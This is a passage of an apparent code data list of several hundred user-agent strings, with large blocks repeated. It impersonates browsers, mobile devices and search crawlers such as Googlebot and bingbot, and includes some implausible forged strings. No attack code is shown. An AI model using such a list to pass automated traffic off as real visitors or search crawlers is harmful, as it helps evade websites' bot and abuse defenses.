MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) 
AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! 
Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) 
Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; 
rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) 